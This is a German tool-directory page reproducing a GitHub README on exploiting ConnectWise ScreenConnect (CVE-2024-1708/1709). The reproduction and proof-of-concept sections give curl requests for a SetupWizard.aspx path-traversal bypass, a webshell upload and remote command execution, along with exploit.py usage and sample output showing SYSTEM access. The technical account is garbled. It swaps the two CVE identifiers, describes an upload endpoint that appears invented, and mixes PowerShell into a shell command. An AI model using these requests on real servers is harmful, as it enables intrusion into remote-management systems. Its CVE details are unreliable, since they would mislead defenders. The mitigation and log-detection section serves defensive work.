Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-1708-connectwise_rce_reproduction — Reproduktion von cve-2024-1708-connectwise_rce_reproduction | Kitploit
Tools/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungRed TeamingPayload-Entwicklung
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

Reproduktion von cve-2024-1708-connectwise_rce_reproduction

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-1708 / CVE-2024-1709 – ConnectWise ScreenConnect: Authentifizierungsumgehung & Remote-Code-Ausführung

CVSS-Score: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (Pfad-Traversal), CWE-288 (Authentifizierungsumgehung über einen alternativen Pfad)
Betroffene Software: ConnectWise ScreenConnect (ehemals ScreenConnect) ≤ 23.9.7
Entdeckt & gemeldet: Februar 2024
In freier Wildbahn ausgenutzt: LockBit, Black Basta, Bl00dy und andere Ransomware-Gruppen


Inhaltsverzeichnis

  1. Übersicht
  2. Technische Details
  3. Betroffene Versionen
  4. Reproduktionsschritte
  5. Proof-of-Concept-Nutzung
  6. Gegenmaßnahmen
  7. Referenzen

1. Übersicht

CVE-2024-1708 und CVE-2024-1709 sind ein verkettetes Schwachstellenpaar in ConnectWise ScreenConnect (ehemals ConnectWise Control), das zusammen einem nicht authentifizierten Remote-Angreifer ermöglicht, eine vollständige Remote-Code-Ausführung auf dem ScreenConnect-Server zu erreichen.

  • CVE-2024-1708 – Authentifizierungsumgehung durch Pfad-Traversal. Der -Endpunkt (und zugehörige Setup-/Upgrade-Endpunkte) bereinigt benutzerbereitgestellte Pfad-Traversal-Sequenzen () nicht ordnungsgemäß. Ein nicht authentifizierter Angreifer kann aus dem vorgesehenen Setup-Verzeichnis austreten und Endpunkte erreichen, die eigentlich eine Authentifizierung erfordern. Da der Assistent im Kontext des -Kontos (Windows) oder -Kontos (Linux) läuft, erbt der Angreifer erhöhte Privilegien.

SetupWizard.aspx
../
SYSTEM
root
  • CVE-2024-1709 – Uneingeschränkter Datei-Upload mit RCE-Folge. Sobald die Authentifizierung umgangen wurde, kann ein Angreifer eine beliebige .aspx- oder andere ausführbare Datei in das Web-Root-Verzeichnis hochladen. Durch das anschließende Anfordern der hochgeladenen Datei wird beliebiger Code auf dem Server ausgeführt.

  • Auswirkungen

    Diese Schwachstellen wurden ab dem 19. Februar 2024 massiv ausgenutzt, und zwar von mehreren Ransomware-Gruppen:

    Ransomware-GruppeKampagnenhinweise
    LockBitBreit angelegtes Scannen von ScreenConnect-Instanzen; verwendet, um nachgelagert den LockBit-Verschlüsseler einzusetzen.
    Black BastaNutzte den Zugang zu MSPs, um in verwaltete Kundennetze vorzudringen.
    Bl00dyKleinskalige Kampagnen, die auf ungepatchte ScreenConnect-Server abzielen.

    Da ScreenConnect üblicherweise von Managed Service Providern (MSPs) eingesetzt wird, um Hunderte nachgelagerter Client-Endpunkte remote zu verwalten, ermöglicht ein einzelner kompromittierter ScreenConnect-Server einen Supply-Chain-Angriff – jeder Client mit einem Agenten, der mit diesem ScreenConnect-Server verbunden ist, ist gefährdet.


    2. Technische Details

    2.1 Authentifizierungsumgehung (CVE-2024-1708)

    Der ScreenConnect-Server stellt einen Setup-Assistenten unter folgender URL bereit:

    root@kitploit:~
    /SetupWizard.aspx/
    

    In bestimmten Upgrade-/Reparaturzuständen erzwingt der Server keine Authentifizierung, da er annimmt, dass der Setup-Assistent die Erstinbetriebnahme-Erfahrung darstellt. Der entscheidende Fehler liegt darin, wie der Server das __Session-Cookie bzw. die Transfer-Encoding-/Content-Type-Header verarbeitet, wenn Pfade unterhalb des Assistenten-Namespace aufgerufen werden.

    Durch Senden einer Anfrage an:

    root@kitploit:~
    /SetupWizard.aspx/../../ScreenConnect/Login.aspx
    

    hebt die Pfad-Traversal den „Setup-Wizard“-Kontext auf, während der Server weiterhin davon ausgeht, dass der nicht authentifizierte Sitzungskontext gilt. Der Angreifer wird weitergeleitet oder erhält Seiten, als wäre er authentifiziert.

    Alternativer Vektor: Die PrepareUpgrade.aspx-/PostUpgrade.aspx-Handler weisen ebenfalls keine Authentifizierungsprüfungen auf und legen Datei-Upload-Funktionalität offen.

    2.2 Remote-Code-Ausführung (CVE-2024-1709)

    Sobald der Angreifer einen authentifizierten Endpunkt erreicht (oder direkt den Datei-Upload-Handler im Setup-Kontext anspricht), kann er eine bösartige .aspx-Webshell hochladen:

    root@kitploit:~
    POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
    Content-Type: multipart/form-data; boundary=----BOUNDARY
    
    ------BOUNDARY
    Content-Disposition: form-data; name="file"; filename="shell.aspx"
    Content-Type: application/octet-stream
    
    <%@ Page Language="C#" %>...
    ------BOUNDARY--
    

    Die Datei wird in das Webanwendungsverzeichnis geschrieben (z. B. C:\Program Files\ScreenConnect\Website\). Beim Anfordern der hochgeladenen Shell wird diese unter der Identität des Servers ausgeführt.

    2.3 Grundursache (CWE-22 / CWE-288)

    • Der Server kanonisiert den Anforderungspfad vor dem Routing nicht.
    • Der SetupWizard.aspx-Handler vertraut darauf, dass jede Anfrage unter seiner Route Teil des Setup-Prozesses ist und die Authentifizierung umgangen werden soll – aber die Pfad-Traversal bricht diese Annahme.
    • Keine ordnungsgemäße Validierung von ../-Sequenzen oder Symlink-Traversal.

    3. Betroffene Versionen

    VersionsbereichStatus
    23.9.7 und älterVerwundbar
    23.9.8Behoben (veröffentlicht am 20. Februar 2024)
    23.9.9Behoben
    23.9.10 (neueste)Behoben

    Hinweis: Selbst gehostete (On-Premise-)ScreenConnect-Server sind die Hauptziele. Die von ConnectWise gehosteten (Cloud-)ScreenConnect-Instanzen wurden vor der öffentlichen Offenlegung gepatcht und waren nie verwundbar.


    4. Reproduktionsschritte

    4.1 Laboraufbau

    1. Laden Sie eine verwundbare ScreenConnect-Version herunter (23.9.7 oder früher).
      Offizielle Installationsprogramme sind möglicherweise über ConnectWise-Partnerarchive verfügbar. Für Tests verwenden Sie eine isolierte VM.
    2. Installieren Sie auf einem Windows Server (2019/2022) oder einem Linux-Host.
      • Standard-Installationspfade:
        • Windows: C:\Program Files\ScreenConnect\
        • Linux: /opt/screenconnect/
      • Standard-Webport: 8040 (HTTP) oder 443 (HTTPS, falls konfiguriert)
    3. Stellen Sie sicher, dass der Server netzwerkisoliert ist – setzen Sie ihn während der Tests nicht dem Internet aus.

    4.2 Schwachstelle verifizieren

    root@kitploit:~
    # Check the version
    curl -s http://<target>:8040/ | Select-String "ScreenConnect"
    

    Alternativ die Weboberfläche aufrufen und die Versionsnummer im Seitenquelltext notieren.

    4.3 Pfad-Traversal-Test

    root@kitploit:~
    curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"
    

    Erwartetes Verhalten auf einem verwundbaren Server:

    • Die Antwort liefert ein 200 OK oder eine 302-Weiterleitung zu einer sitzungsauthentifizierten Seite ohne die normale Login-Aufforderung.
    • Die Antwort kann den HTML-Code der ScreenConnect-Admin-Konsole enthalten.

    4.4 Webshell-Upload

    root@kitploit:~
    curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
      -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
      -F "[email protected]"
    

    4.5 Befehle ausführen

    root@kitploit:~
    curl "http://<target>:8040/shell.aspx?cmd=whoami"
    

    5. Proof-of-Concept-Nutzung

    Das beiliegende exploit.py-Skript automatisiert die obigen Schritte:

    root@kitploit:~
    usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]
    
    Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE
    
    options:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target hostname or IP
      -p PORT, --port PORT  Target port (default: 8040)
      -c COMMAND, --command COMMAND
                            Command to execute (default: whoami)
      --ssl                 Use HTTPS
    
    Example:
      python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"
    

    Beispielausführung

    root@kitploit:~
    $ python exploit.py -t 192.168.1.100 -c "whoami"
    
    [*] Target: 192.168.1.100:8040
    [*] Using SSL: False
    [*] Step 1: Testing path traversal for auth bypass...
    [+] Target appears vulnerable! Server version: 23.9.7
    [*] Step 2: Uploading webshell...
    [+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
    [*] Step 3: Executing command 'whoami'...
    [+] Output:
    nt authority\system
    

    6. Gegenmaßnahmen

    Sofortmaßnahmen (Patch)

    • Aktualisieren Sie ScreenConnect auf Version 23.9.8 oder höher.
    • ConnectWise hat am 20. Februar 2024 Patches veröffentlicht.

    Kompensierende Kontrollen

    KontrollmaßnahmeUmsetzung
    WAF-RegelnAnfragen blockieren, die ../ im URL-Pfad nach /SetupWizard.aspx/ enthalten
    NetzwerksegmentierungScreenConnect in einem separaten Management-VLAN mit strenger Egress-Filterung platzieren
    ZugriffskontrolleZugriff auf die ScreenConnect-Weboberfläche auf vertrauenswürdige IP-Bereiche beschränken
    ÜberwachungWarnungen bei Anfragen an /SetupWizard.aspx/ aus externen Quellen oder bei unerwarteter .aspx-Dateierstellung in ScreenConnect\Website\
    MFAMFA würde dies zwar nicht verhindern (die Authentifizierungsumgehung erfolgt vor dem Login), dennoch für alle Administrationskonten zur Verteidigung in der Tiefe erzwingen

    Erkennung

    Suchen Sie in Webserver-Logs nach den folgenden IoCs:

    root@kitploit:~
    GET /SetupWizard.aspx/../../ScreenConnect/
    POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
    GET /*.aspx?cmd=
    

    7. Referenzen

    QuelleURL
    NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
    NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
    ConnectWise-Sicherheitshinweishttps://www.connectwise.com/company/trust/security-advisories
    Huntress Labs - Erstmeldunghttps://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
    CISA – Bekannte ausgenutzte Schwachstellenhttps://www.cisa.gov/known-exploited-vulnerabilities
    ATT&CK-Technik: Externe Remote-Dienste (T1133)https://attack.mitre.org/techniques/T1133/

    Haftungsausschluss

    Dieses Repository wird ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken bereitgestellt. Nicht autorisierte Tests an Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, sind illegal. Die Autoren sind nicht für Missbrauch dieser Informationen verantwortlich.

    Tool herunterladen